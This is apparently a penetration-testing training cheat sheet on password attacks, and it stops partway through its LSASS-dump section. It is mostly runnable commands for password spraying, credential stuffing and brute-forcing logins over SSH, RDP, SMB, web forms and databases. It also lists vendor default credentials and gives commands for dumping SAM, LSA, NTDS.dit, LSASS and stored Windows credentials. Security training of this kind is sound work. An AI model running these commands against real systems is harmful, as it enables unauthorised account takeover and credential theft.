Password Attacks Workflow

Password Attacks Workflow

Purpose: Comprehensive training reference for penetration testing, password attack methodologies, tools, and techniques. MITRE ATT&CK: T1110 (Brute Force), T1078 (Valid Accounts), T1552 (Unsecured Credentials)

---

Table of Contents

• Overview

• Attack Methodology

• Attack Types

• Default Credentials

• Brute-Forcing Tools

• Wordlist Generation

• Password Mutation

• Remote Password Attacks

• Windows Local Password Attacks

• Linux Local Password Attacks

• Hash Cracking

• Protocol-Specific Attacks

• Defensive Considerations

• Quick Reference

---

Overview

What is Password Attacking?

Password attacks involve techniques for obtaining, guessing, or cracking authentication credentials—these range from simple brute-force attempts to sophisticated credential-harvesting and hash-cracking operations.

Attack Surface Considerations

Factor	Impact	Mitigation Challenge
Password Complexity	Exponentially increases attack time	Users choose weak passwords
Account Lockout Policies	Limits online attacks	May cause denial of service
Multi-Factor Authentication	Blocks credential-only attacks	Implementation gaps exist
Password Storage Method	Determines offline attack viability	Legacy systems use weak hashing
Network Segmentation	Limits lateral movement	Internal trust relationships

Attack Decision Framework

Target Assessment:

1. Online Attack: Hydra, Medusa, Spray, Stuffing

2. Offline Attack: Hashcat, John, Rainbow, Tables

3. Credential Harvesting: Phishing, MITM, Memory Dump, File Search

---

Attack Methodology

Phase 1: Reconnaissance

Gather intelligence to inform attack strategy:

# Enumerate users via LDAP (if anonymous bind allowed)
ldapsearch -x -H ldap://target.com -b "dc=target,dc=com" "(objectClass=user)" sAMAccountName

# Enumerate users via RPC
rpcclient -U "" -N target.com -c "enumdomusers"

# Enumerate users via Kerberos (no auth required)
kerbrute userenum -d target.com --dc dc.target.com userlist.txt

# OSINT for usernames
theHarvester -d target.com -b google,linkedin,twitter

# Extract usernames from metadata
exiftool -a -u document.pdf | grep -i "author\|creator"

Phase 2: Credential Discovery

Search for existing credentials before attacking:

# Search GitHub for leaked credentials
trufflehog git https://github.com/target/repo --only-verified

# Search paste sites
python3 pwnedornot.py -e target@company.com

# Check HaveIBeenPwned API
curl "https://haveibeenpwned.com/api/v3/breachedaccount/user@target.com"

Phase 3: Attack Execution

Select attack type based on gathered intelligence and target defences.

Phase 4: Post-Exploitation

Leverage obtained credentials for lateral movement and privilege escalation.

---

Attack Types

Simple Brute Force

Systematically tries every possible character combination.

Charset	Length	Combinations	Time @ 1M/s
Lowercase (26)	6	308M	5 minutes
Alphanumeric (62)	6	56B	15 hours
Full ASCII (95)	6	735B	8.5 days
Alphanumeric (62)	8	218T	6.9 years

Best for: No prior knowledge, short passwords, weak complexity requirements

Dictionary Attack

Uses pre-compiled wordlists of common passwords.

# Popular wordlists locations
/usr/share/wordlists/rockyou.txt              # 14M passwords
/usr/share/wordlists/seclists/Passwords/      # Multiple specialised lists
/usr/share/wordlists/fasttrack.txt            # Quick common passwords

# Download SecLists
git clone https://github.com/danielmiessler/SecLists.git

Best for: Common passwords, initial quick attacks, resource-limited scenarios

Hybrid Attack

Combines dictionary words with brute force mutations.

# Hashcat hybrid: dictionary + 4 digits appended
hashcat -a 6 -m 0 hashes.txt wordlist.txt ?d?d?d?d

# Hashcat hybrid: 2 chars prepended + dictionary
hashcat -a 7 -m 0 hashes.txt ?u?u wordlist.txt

# Combine two wordlists
hashcat -a 1 -m 0 hashes.txt wordlist1.txt wordlist2.txt

Best for: Modified common passwords (Password123!, Summer2024!)

Credential Stuffing

Uses leaked credentials from other breaches.

# Format: user:password or user@domain:password
# Tools: Sentry MBA, OpenBullet, custom scripts

# Simple credential stuffing with Hydra
hydra -C credentials.txt target.com https-post-form \
  "/login:username=^USER^&password=^PASS^:Invalid"

# Using ffuf for web credential stuffing
ffuf -w credentials.txt:CREDS -u https://target.com/login \
  -X POST -d "user=CREDS" -fs 1234 -mode clusterbomb

Best for: Users who reuse passwords across services

Password Spraying

Attempts common passwords across many accounts.

# Spray against AD with CrackMapExec
crackmapexec smb dc.target.com -u users.txt -p 'Spring2024!' --continue-on-success

# Spray against Office 365
python3 MSOLSpray.py -u users.txt -p 'Company2024!'

# Spray against OWA
ruler --domain target.com -k spray -u users.txt -p passwords.txt --delay 60

# Kerbrute spray (fast, no lockout on pre-auth)
kerbrute passwordspray -d target.com users.txt 'Winter2024!'

Best for: Environments with lockout policies, large user bases

Rainbow Table Attack

Uses precomputed hash-to-password mappings.

# Generate rainbow tables with rtgen
rtgen md5 loweralpha 1 7 0 3800 33554432 0

# Crack with rcrack
rcrack /path/to/tables -h 5d41402abc4b2a76b9719d911017c592

# Online rainbow table services
# https://crackstation.net
# https://hashes.com

Best for: Unsalted hashes, NTLM hashes, large hash datasets

Reverse Brute Force

Tests known password against multiple usernames.

# Single password against user list
hydra -L users.txt -p 'Welcome1!' ssh://target.com

# Common default passwords
hydra -L users.txt -p 'Changeme123' rdp://target.com
hydra -L users.txt -p 'Password1' smb://target.com

Best for: Suspected password reuse, default password scenarios

Distributed Brute Force

Distributes attack load across multiple systems.

# Using Hashtopolis for distributed hashcat
# Server setup: https://github.com/hashtopolis/server

# Parallel Hydra with multiple IPs (rotate source)
for ip in $(cat proxies.txt); do
  proxychains -f $ip.conf hydra -L users.txt -P pass.txt target ssh &
done

---

Default Credentials

Network Infrastructure

Device/Vendor	Username	Password	Notes
Cisco IOS	cisco	cisco	Also: admin/admin
Cisco Enable	-	cisco	Enable mode
Juniper	root	(none)	SSH access
Palo Alto	admin	admin	Web interface
Fortinet	admin	(none)	Empty password
F5 BIG-IP	admin	admin	Also: root/default
Arista	admin	(none)	SSH access
Ubiquiti	ubnt	ubnt	All products
MikroTik	admin	(none)	Empty password
Netgear	admin	password	Consumer routers
TP-Link	admin	admin	Consumer routers
Linksys	admin	admin	Consumer routers
D-Link	admin	(none)	Consumer routers
ASUS	admin	admin	Consumer routers
Zyxel	admin	1234	Various products

Web Applications & Services

Application	Username	Password	Notes
Apache Tomcat	tomcat	tomcat	Also: admin/admin
Jenkins	admin	(varies)	Check /script
phpMyAdmin	root	(none)	MySQL default
pgAdmin	postgres	postgres	PostgreSQL
MongoDB	(none)	(none)	No auth by default
Redis	(none)	(none)	No auth by default
Elasticsearch	elastic	changeme	X-Pack security
Grafana	admin	admin	Force change
WordPress	admin	admin	Installation
Joomla	admin	admin	Installation
Drupal	admin	admin	Installation
GLPI	glpi	glpi	IT asset mgmt
Zabbix	Admin	zabbix	Monitoring
Nagios	nagiosadmin	nagiosadmin	Monitoring
Splunk	admin	changeme	SIEM
Graylog	admin	admin	Log mgmt

Virtualization & Cloud

Platform	Username	Password	Notes
VMware ESXi	root	(none)	Set during install
vCenter	administrator@vsphere.local	(varies)
Proxmox	root	(set)	PAM authentication
XenServer	root	(set)
Docker	(none)	(none)	No default auth
Kubernetes	(none)	(none)	Service accounts
AWS	(IAM)	(IAM)	No defaults
Azure	(varies)	(varies)	Subscription admin

Out-of-Band Management

Device	Username	Password	Notes
HP iLO	Administrator	(varies)	Check label
Dell iDRAC	root	calvin	Very common
IBM IMM	USERID	PASSW0RD	Note the zero
Supermicro IPMI	ADMIN	ADMIN	All caps
Lenovo XCC	USERID	PASSW0RD
Cisco CIMC	admin	password	UCS servers

Databases

Database	Username	Password	Port
MySQL	root	(none)	3306
PostgreSQL	postgres	postgres	5432
MSSQL	sa	(varies)	1433
Oracle	SYS	change_on_install	1521
Oracle	SYSTEM	manager	1521
MongoDB	admin	(none)	27017
Redis	(none)	(none)	6379
CouchDB	admin	admin	5984
Cassandra	cassandra	cassandra	9042

Default Credential Resources

# Online databases
# https://www.cirt.net/passwords
# https://default-password.info
# https://datarecovery.com/rd/default-passwords/

# SecLists default credentials
/usr/share/seclists/Passwords/Default-Credentials/

# Nmap script for default creds
nmap --script=http-default-accounts target.com

---

Brute-Forcing Tools

Hydra

Fast, flexible network login cracker supporting 50+ protocols.

# Basic syntax
hydra [options] target service

# SSH brute force
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
hydra -L users.txt -P passwords.txt ssh://192.168.1.100 -t 4

# FTP brute force
hydra -l admin -P passwords.txt ftp://192.168.1.100

# HTTP Basic Auth
hydra -l admin -P passwords.txt 192.168.1.100 http-get /admin/

# HTTP POST Form (login page)
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/login.php:username=^USER^&password=^PASS^:F=incorrect"

# HTTP POST Form with cookies
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/login:user=^USER^&pass=^PASS^:F=failed:H=Cookie: session=abc123"

# HTTPS POST Form
hydra -l admin -P passwords.txt 192.168.1.100 https-post-form \
  "/login:user=^USER^&pass=^PASS^:F=invalid"

# RDP brute force
hydra -l administrator -P passwords.txt rdp://192.168.1.100

# SMB brute force
hydra -L users.txt -P passwords.txt smb://192.168.1.100

# MySQL brute force
hydra -l root -P passwords.txt mysql://192.168.1.100

# PostgreSQL brute force
hydra -l postgres -P passwords.txt postgres://192.168.1.100

# MSSQL brute force
hydra -l sa -P passwords.txt mssql://192.168.1.100

# LDAP brute force
hydra -l "cn=admin,dc=example,dc=com" -P passwords.txt ldap://192.168.1.100

# SNMP community string brute force
hydra -P communities.txt 192.168.1.100 snmp

# VNC brute force (password only)
hydra -P passwords.txt vnc://192.168.1.100

# Telnet brute force
hydra -l admin -P passwords.txt telnet://192.168.1.100

# IMAP brute force
hydra -l user@domain.com -P passwords.txt imap://mail.domain.com

# POP3 brute force
hydra -l user -P passwords.txt pop3://mail.domain.com

# SMTP AUTH brute force
hydra -l user@domain.com -P passwords.txt smtp://mail.domain.com

# Using colon-separated credentials file
hydra -C creds.txt ssh://192.168.1.100

# Verbose output with wait time
hydra -l admin -P passwords.txt -V -W 3 ssh://192.168.1.100

# Resume previous session
hydra -R

# Useful options
# -t [threads]     : Number of parallel connections (default 16)
# -w [seconds]     : Wait time between requests
# -f               : Exit after first found credential
# -F               : Exit after first found credential per host
# -v / -V          : Verbose / very verbose
# -d               : Debug mode
# -o [file]        : Output to file
# -b [format]      : Output format (text, json, jsonv1)

Medusa

Parallel, modular login brute-forcer.

# Basic syntax
medusa -h host -u user -P passwords.txt -M module

# SSH brute force
medusa -h 192.168.1.100 -u root -P passwords.txt -M ssh
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh -t 5

# FTP brute force
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ftp

# HTTP brute force
medusa -h 192.168.1.100 -u admin -P passwords.txt -M http -m DIR:/admin

# RDP brute force
medusa -h 192.168.1.100 -u administrator -P passwords.txt -M rdp

# SMB brute force
medusa -h 192.168.1.100 -u admin -P passwords.txt -M smbnt

# MySQL brute force
medusa -h 192.168.1.100 -u root -P passwords.txt -M mysql

# PostgreSQL brute force
medusa -h 192.168.1.100 -u postgres -P passwords.txt -M postgres

# Multiple hosts from file
medusa -H hosts.txt -u admin -P passwords.txt -M ssh

# Combination file (host:user:pass)
medusa -C combo.txt -M ssh

# Useful options
# -t [threads]     : Number of parallel logins per host
# -T [threads]     : Number of hosts to test concurrently
# -f               : Stop after first valid credential
# -F               : Stop after first valid credential on any host
# -b               : Suppress banner
# -v [level]       : Verbosity (0-6)
# -O [file]        : Output file

Ncrack

High-speed network authentication cracker.

# Basic syntax
ncrack [options] target:port

# SSH brute force
ncrack -p ssh -U users.txt -P passwords.txt 192.168.1.100

# RDP brute force
ncrack -p rdp -u administrator -P passwords.txt 192.168.1.100

# FTP brute force with timing
ncrack -p ftp -U users.txt -P passwords.txt --timing 4 192.168.1.100

# Multiple services
ncrack -p ssh,ftp,telnet -U users.txt -P passwords.txt 192.168.1.100

# Resume session
ncrack --resume session.ncrack

# Useful options
# -U [file]        : Username file
# -P [file]        : Password file
# --user [user]    : Single username
# --pass [pass]    : Single password
# -T [0-5]         : Timing template
# -g [opts]        : Global options (CL=connection limit, etc.)
# -oN [file]       : Normal output
# -oX [file]       : XML output

CrackMapExec (NetExec)

Swiss army knife for Windows/AD environments.

# SMB password spraying
crackmapexec smb 192.168.1.0/24 -u admin -p 'Password123'
crackmapexec smb dc.target.com -u users.txt -p passwords.txt --continue-on-success

# SMB with hash (Pass-the-Hash)
crackmapexec smb 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:hash

# WinRM brute force
crackmapexec winrm 192.168.1.100 -u admin -p passwords.txt

# LDAP brute force
crackmapexec ldap dc.target.com -u users.txt -p passwords.txt

# MSSQL brute force
crackmapexec mssql 192.168.1.100 -u sa -p passwords.txt

# SSH brute force
crackmapexec ssh 192.168.1.100 -u root -p passwords.txt

# Check if credentials are local admin
crackmapexec smb 192.168.1.100 -u admin -p 'Pass123' --local-auth

# Dump SAM database
crackmapexec smb 192.168.1.100 -u admin -p 'Pass123' --local-auth --sam

# Dump LSA secrets
crackmapexec smb 192.168.1.100 -u admin -p 'Pass123' --local-auth --lsa

# Dump NTDS.dit (domain admin required)
crackmapexec smb dc.target.com -u admin -p 'Pass123' --ntds

# Enumerate shares
crackmapexec smb 192.168.1.100 -u admin -p 'Pass123' --shares

# Enumerate users
crackmapexec smb dc.target.com -u admin -p 'Pass123' --users

# Execute commands
crackmapexec smb 192.168.1.100 -u admin -p 'Pass123' -x 'whoami'
crackmapexec smb 192.168.1.100 -u admin -p 'Pass123' -X 'Get-Process' # PowerShell

Patator

Multi-purpose brute-forcer with modular design.

# SSH brute force
patator ssh_login host=192.168.1.100 user=root password=FILE0 0=passwords.txt

# FTP brute force
patator ftp_login host=192.168.1.100 user=admin password=FILE0 0=passwords.txt

# HTTP POST brute force
patator http_fuzz url=http://target/login method=POST \
  body='user=admin&pass=FILE0' 0=passwords.txt \
  -x ignore:fgrep='Login failed'

# MySQL brute force
patator mysql_login host=192.168.1.100 user=root password=FILE0 0=passwords.txt

# LDAP brute force
patator ldap_login host=192.168.1.100 \
  binddn='cn=FILE0,dc=example,dc=com' 0=users.txt \
  bindpw=FILE1 1=passwords.txt

# DNS zone transfer attempt
patator dns_forward name=FILE0.target.com qtype=ANY 0=subdomains.txt

# Useful options
# -x ignore:code=XXX  : Ignore responses with code
# -x ignore:fgrep=STR : Ignore responses containing string
# -t [threads]        : Number of threads
# --rate-limit [n]    : Requests per second

Kerbrute

Fast Kerberos brute-forcer (no account lockout on pre-auth failures).

# User enumeration
kerbrute userenum -d target.com --dc dc.target.com userlist.txt

# Password spraying
kerbrute passwordspray -d target.com --dc dc.target.com users.txt 'Winter2024!'

# Brute force single user
kerbrute bruteuser -d target.com --dc dc.target.com passwords.txt admin

# Password spraying with delay
kerbrute passwordspray -d target.com users.txt 'Pass123' --delay 100

---

Wordlist Generation

Username Generation

Username Anarchy

# Generate from single name
username-anarchy "John Smith"
# Output: jsmith, john.smith, smithj, j.smith, etc.

# Generate from file of names
username-anarchy -i names.txt

# US-style formatting
username-anarchy -a --country us "John Smith"

# List available formats
username-anarchy -l

# Specific formats only
username-anarchy -f first.last,flast "John Smith"

# Add email domain
username-anarchy -@ company.com "John Smith"

# Case variations
username-anarchy --case-insensitive "John Smith"

# Custom format
username-anarchy -F "{first}{last}" "John Smith"

Manual Username Patterns

# Common corporate patterns
echo "John Smith" | awk '{print tolower($1"."$2)}'      # john.smith
echo "John Smith" | awk '{print tolower(substr($1,1,1)$2)}'  # jsmith
echo "John Smith" | awk '{print tolower($1substr($2,1,1))}'  # johns
echo "John Smith" | awk '{print tolower($2"."$1)}'      # smith.john

# Generate variations from first/last name lists
while read first; do
  while read last; do
    echo "${first}.${last}"
    echo "${first:0:1}${last}"
    echo "${first}${last:0:1}"
  done < lastnames.txt
done < firstnames.txt

CUPP (Common User Passwords Profiler)

Generate targeted wordlists based on personal information.

# Interactive mode - asks questions about target
cupp -i
# Questions: name, nickname, birthdate, partner info, pet names, company, etc.

# Generate from existing profile
cupp -w profile.txt

# Download common wordlists
cupp -l

# Alecto database (default usernames/passwords)
cupp -a

# Example profile file format for -w:
# [personal]
# firstname = John
# surname = Smith
# nick = Johnny
# birthdate = 19850315
# [partner]
# name = Jane
# ...

CeWL (Custom Word List Generator)

Spider websites to generate contextual wordlists.

# Basic website spider
cewl https://www.target.com -w wordlist.txt

# Spider with depth and minimum word length
cewl https://www.target.com -d 4 -m 6 -w wordlist.txt

# Include lowercase only
cewl https://www.target.com -d 4 -m 6 --lowercase -w wordlist.txt

# Include email addresses
cewl https://www.target.com -e --email_file emails.txt -w wordlist.txt

# Include metadata from documents
cewl https://www.target.com --meta --meta_file meta.txt -w wordlist.txt

# With authentication
cewl https://www.target.com -a --auth_user admin --auth_pass password -w wordlist.txt

# Follow external links
cewl https://www.target.com --offsite -w wordlist.txt

# Custom user agent
cewl https://www.target.com --ua "Mozilla/5.0" -w wordlist.txt

# Verbose with count
cewl https://www.target.com -d 4 -m 6 -c -w wordlist.txt

Mentalist

GUI-based wordlist generator (useful for complex rule creation).

# Install
pip install mentalist

# Launch GUI
mentalist

# Features:
# - Visual chain building
# - Case modifications
# - Character substitutions (leet speak)
# - Prepend/append operations
# - Custom rule export for hashcat/john

Crunch

Generate wordlists with specified patterns.

# Generate all 4-character lowercase combinations
crunch 4 4 abcdefghijklmnopqrstuvwxyz -o wordlist.txt

# Generate 6-8 char with numbers and lowercase
crunch 6 8 0123456789abcdefghijklmnopqrstuvwxyz -o wordlist.txt

# Using character sets
crunch 8 8 -f /usr/share/crunch/charset.lst mixalpha-numeric -o wordlist.txt

# Pattern-based generation
# @ = lowercase, , = uppercase, % = numbers, ^ = symbols
crunch 8 8 -t Pass%%^^ -o wordlist.txt
# Generates: Pass00!!, Pass00!@, Pass00!#, etc.

# Company name patterns
crunch 10 12 -t Company%%% -o wordlist.txt

# Start at specific position
crunch 4 4 0123456789 -s 1000 -o wordlist.txt

# Limit output size (bytes)
crunch 6 6 -f charset.lst lalpha -b 10mb -o START

# Pipe to other tools (avoid disk)
crunch 6 6 0123456789 | hydra -l admin -P - ssh://target

Wordlist Management

# Combine multiple wordlists
cat wordlist1.txt wordlist2.txt wordlist3.txt | sort -u > combined.txt

# Remove duplicates
sort wordlist.txt | uniq > unique.txt

# Sort by frequency
sort wordlist.txt | uniq -c | sort -rn | awk '{print $2}' > sorted.txt

# Filter by length
awk 'length >= 8 && length <= 12' wordlist.txt > filtered.txt

# Remove lines containing patterns
grep -v -E "^[0-9]+$" wordlist.txt > no_numbers_only.txt

# Convert to lowercase
tr 'A-Z' 'a-z' < wordlist.txt > lowercase.txt

# Extract unique words from file
strings file.bin | tr ' ' '\n' | sort -u > extracted.txt

---

Password Mutation

Password Policy Filtering

Filter wordlists to match target password policies.

# Minimum 8 characters
grep -E '^.{8,}$' wordlist.txt > filtered.txt

# At least one uppercase
grep -E '[A-Z]' wordlist.txt > has_upper.txt

# At least one lowercase
grep -E '[a-z]' wordlist.txt > has_lower.txt

# At least one digit
grep -E '[0-9]' wordlist.txt > has_digit.txt

# At least one special character
grep -E '[!@#$%^&*()_+\-=\[\]{};:"|,.<>/?]' wordlist.txt > has_special.txt

# Combined: 8+ chars with upper, lower, digit
grep -E '^.{8,}$' wordlist.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' > policy_compliant.txt

# No consecutive repeated characters
grep -vE '(.)\1' wordlist.txt > no_repeats.txt

# Exclude dictionary words
grep -v -f /usr/share/dict/words wordlist.txt > no_dict.txt

# Exclude common patterns
grep -vi -E 'password|123456|qwerty|admin' wordlist.txt > no_common.txt

# Maximum length
grep -E '^.{1,16}$' wordlist.txt > max16.txt

# Must start with letter
grep -E '^[A-Za-z]' wordlist.txt > starts_letter.txt

# Must not start with number
grep -vE '^[0-9]' wordlist.txt > no_start_num.txt

# Complex one-liner
awk 'length >= 8 && length <= 16 && /[A-Z]/ && /[a-z]/ && /[0-9]/ && /[!@#$%^&*]/' wordlist.txt

Hashcat Rules

Apply mutations during cracking.

# Use built-in rules
hashcat -m 0 -a 0 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 0 -a 0 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/rockyou-30000.rule
hashcat -m 0 -a 0 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/d3ad0ne.rule

# Multiple rule files (chain)
hashcat -m 0 hashes.txt wordlist.txt -r rule1.rule -r rule2.rule

# Generate mutated wordlist
hashcat --force wordlist.txt -r best64.rule --stdout > mutated.txt

# Common rule functions:
# l    = lowercase all
# u    = uppercase all
# c    = capitalize first, lowercase rest
# C    = lowercase first, uppercase rest
# t    = toggle case all
# $X   = append X
# ^X   = prepend X
# sXY  = replace X with Y
# d    = duplicate word
# r    = reverse
# [    = delete first char
# ]    = delete last char

Example custom rule file:

# custom.rule
:               # Original word
l               # lowercase
u               # uppercase
c               # Capitalize
$1              # Append 1
$!              # Append !
$1$2$3          # Append 123
^1              # Prepend 1
c$!             # Capitalize + !
c$1$!           # Capitalize + 1!
c$2$0$2$4$!     # Capitalize + 2024!
sa@             # Replace a with @
se3             # Replace e with 3
so0             # Replace o with 0
si1             # Replace i with 1
sa@se3so0si1    # Leet speak

John the Ripper Rules

# Use default rules
john --wordlist=wordlist.txt --rules hashes.txt

# Specific rule set
john --wordlist=wordlist.txt --rules=Single hashes.txt
john --wordlist=wordlist.txt --rules=Wordlist hashes.txt
john --wordlist=wordlist.txt --rules=Extra hashes.txt
john --wordlist=wordlist.txt --rules=Jumbo hashes.txt

# Generate mutations only
john --wordlist=wordlist.txt --rules --stdout > mutated.txt

# Show available rules
john --list=rules

Manual Mutation Techniques

# Common year appending
for word in $(cat wordlist.txt); do
  echo "$word"
  echo "${word}2023"
  echo "${word}2024"
  echo "${word}2025"
  echo "${word}!"
  echo "${word}123"
  echo "${word}@123"
done > mutated.txt

# Leet speak conversion
sed 's/a/@/g; s/e/3/g; s/i/1/g; s/o/0/g; s/s/$/g' wordlist.txt > leet.txt

# Case variations
while read word; do
  echo "$word"
  echo "${word^}"      # First letter uppercase
  echo "${word^^}"     # All uppercase
  echo "${word,,}"     # All lowercase
done < wordlist.txt > cases.txt

# Common keyboard walks to add
echo -e "qwerty\nQWERTY\n123456\n!@#$%^\nasdfgh\nzxcvbn" >> wordlist.txt

---

Remote Password Attacks

Windows Services

SMB (445/TCP)

# CrackMapExec
crackmapexec smb 192.168.1.100 -u admin -p 'Password123'
crackmapexec smb 192.168.1.100 -u users.txt -p passwords.txt
crackmapexec smb 192.168.1.100 -u admin -H '<NT_HASH>' # Pass-the-Hash

# Hydra
hydra -l administrator -P passwords.txt smb://192.168.1.100

# Metasploit
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.1.100
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

RDP (3389/TCP)

# Hydra
hydra -l administrator -P passwords.txt rdp://192.168.1.100 -t 1 -W 3

# Ncrack
ncrack -p rdp -u administrator -P passwords.txt 192.168.1.100

# CrackMapExec
crackmapexec rdp 192.168.1.100 -u admin -p passwords.txt

# Crowbar (slow but reliable)
crowbar -b rdp -s 192.168.1.100/32 -u admin -C passwords.txt

WinRM (5985/5986)

# CrackMapExec
crackmapexec winrm 192.168.1.100 -u admin -p passwords.txt

# Evil-WinRM (single attempt with valid creds)
evil-winrm -i 192.168.1.100 -u admin -p 'Password123'
evil-winrm -i 192.168.1.100 -u admin -H '<NT_HASH>'

# Metasploit
use auxiliary/scanner/winrm/winrm_login

MSSQL (1433/TCP)

# Hydra
hydra -l sa -P passwords.txt mssql://192.168.1.100

# CrackMapExec
crackmapexec mssql 192.168.1.100 -u sa -p passwords.txt

# Metasploit
use auxiliary/scanner/mssql/mssql_login

# Impacket
python3 mssqlclient.py sa:'Password123'@192.168.1.100

Linux Services

SSH (22/TCP)

# Hydra
hydra -l root -P passwords.txt ssh://192.168.1.100
hydra -L users.txt -P passwords.txt ssh://192.168.1.100 -t 4

# Medusa
medusa -h 192.168.1.100 -u root -P passwords.txt -M ssh -t 4

# Ncrack
ncrack -p ssh -u root -P passwords.txt 192.168.1.100

# Patator
patator ssh_login host=192.168.1.100 user=root password=FILE0 0=passwords.txt

# Metasploit
use auxiliary/scanner/ssh/ssh_login

FTP (21/TCP)

# Hydra
hydra -l admin -P passwords.txt ftp://192.168.1.100

# Medusa
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ftp

# Ncrack
ncrack -p ftp -u admin -P passwords.txt 192.168.1.100

# Anonymous check
ftp 192.168.1.100
# User: anonymous, Pass: anything

Telnet (23/TCP)

# Hydra
hydra -l admin -P passwords.txt telnet://192.168.1.100

# Medusa
medusa -h 192.168.1.100 -u admin -P passwords.txt -M telnet

# Ncrack
ncrack -p telnet -u admin -P passwords.txt 192.168.1.100

Web Services

HTTP Basic Auth

# Hydra
hydra -l admin -P passwords.txt 192.168.1.100 http-get /admin/

# Medusa
medusa -h 192.168.1.100 -u admin -P passwords.txt -M http -m DIR:/admin/

# Ncrack
ncrack -p http -u admin -P passwords.txt 192.168.1.100

HTTP POST Form

# Hydra - identify failure string
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/login.php:username=^USER^&password=^PASS^:F=Login failed"

# Hydra - identify success string
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/login.php:username=^USER^&password=^PASS^:S=Welcome"

# With cookies
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/login:user=^USER^&pass=^PASS^:F=incorrect:H=Cookie: PHPSESSID=abc123"

# HTTPS
hydra -l admin -P passwords.txt 192.168.1.100 https-post-form \
  "/login:user=^USER^&pass=^PASS^:F=failed"

# ffuf for web brute force
ffuf -u http://192.168.1.100/login -X POST \
  -d "username=admin&password=FUZZ" \
  -w passwords.txt -fc 401,403

# Burp Intruder (GUI) - most flexible for complex forms

WordPress

# WPScan
wpscan --url http://target.com --passwords passwords.txt --usernames admin

# xmlrpc multicall attack (faster)
wpscan --url http://target.com --passwords passwords.txt --usernames admin \
  --password-attack xmlrpc-multicall

# Hydra (wp-login.php)
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/wp-login.php:log=^USER^&pwd=^PASS^:F=incorrect"

Database Services

MySQL (3306/TCP)

# Hydra
hydra -l root -P passwords.txt mysql://192.168.1.100

# Medusa
medusa -h 192.168.1.100 -u root -P passwords.txt -M mysql

# Metasploit
use auxiliary/scanner/mysql/mysql_login

# Direct connection test
mysql -h 192.168.1.100 -u root -p

PostgreSQL (5432/TCP)

# Hydra
hydra -l postgres -P passwords.txt postgres://192.168.1.100

# Medusa
medusa -h 192.168.1.100 -u postgres -P passwords.txt -M postgres

# Metasploit
use auxiliary/scanner/postgres/postgres_login

MongoDB (27017/TCP)

# Nmap scripts
nmap -p 27017 --script=mongodb-brute 192.168.1.100

# Manual connection (if no auth)
mongosh 192.168.1.100

# Metasploit
use auxiliary/scanner/mongodb/mongodb_login

Redis (6379/TCP)

# Check for no auth
redis-cli -h 192.168.1.100 ping

# Nmap scripts
nmap -p 6379 --script=redis-brute 192.168.1.100

# If auth required
redis-cli -h 192.168.1.100 -a password

Other Services

SNMP (161/UDP)

# Onesixtyone
onesixtyone -c community_strings.txt 192.168.1.100

# Hydra
hydra -P community_strings.txt 192.168.1.100 snmp

# Nmap
nmap -sU -p 161 --script=snmp-brute 192.168.1.100

VNC (5900/TCP)

# Hydra (password only)
hydra -P passwords.txt vnc://192.168.1.100

# Ncrack
ncrack -p vnc -P passwords.txt 192.168.1.100

# Medusa
medusa -h 192.168.1.100 -P passwords.txt -M vnc

LDAP (389/636)

# Hydra
hydra -l "cn=admin,dc=example,dc=com" -P passwords.txt ldap://192.168.1.100

# Nmap
nmap -p 389 --script=ldap-brute 192.168.1.100

---

Windows Local Password Attacks

Credential Discovery

File System Search

# Search for password in files
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.ps1 *.yml *.json

# Search specific directories
findstr /SI /C:"password" C:\Users\*.*
findstr /SI /C:"pass=" C:\inetpub\wwwroot\*.*

# PowerShell recursive search
Get-ChildItem -Path C:\ -Include *.txt,*.ini,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"

# Search for credential files
dir /s /b *pass*.txt *cred* *vnc*.ini *.config web.config

# PowerShell search for specific patterns
Get-ChildItem -Recurse | Select-String -Pattern "connectionstring|password|pwd=" -List

Registry Search

# Autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

# Saved RDP credentials
reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s

# VNC passwords
reg query "HKLM\SOFTWARE\RealVNC\WinVNC4" /v Password
reg query "HKCU\SOFTWARE\TightVNC\Server" /v Password

# Putty saved sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s

# Snmp community strings
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities"

# Search all registry for password
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Credential Manager

# List stored credentials (requires elevation for SYSTEM)
cmdkey /list

# PowerShell credential enumeration
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | ForEach-Object { $_.RetrievePassword(); $_ }

# Using Mimikatz
sekurlsa::credman

Unattended Installation Files

# Common locations
type C:\unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\unattend\Unattend.xml
type C:\Windows\system32\sysprep\sysprep.xml
type C:\Windows\system32\sysprep\sysprep.inf

# Search for unattend files
dir /s /b unattend.xml sysprep.xml sysprep.inf

Memory Attacks

LSASS Dump

# Using Task Manager (GUI)
# Right-click lsass.exe > Create Dump File

# Using procdump (Sysinternals)
procdump.exe -ma lsass.exe lsass.dmp

# Using comsvcs.dll (built-in)
Get-Process lsass
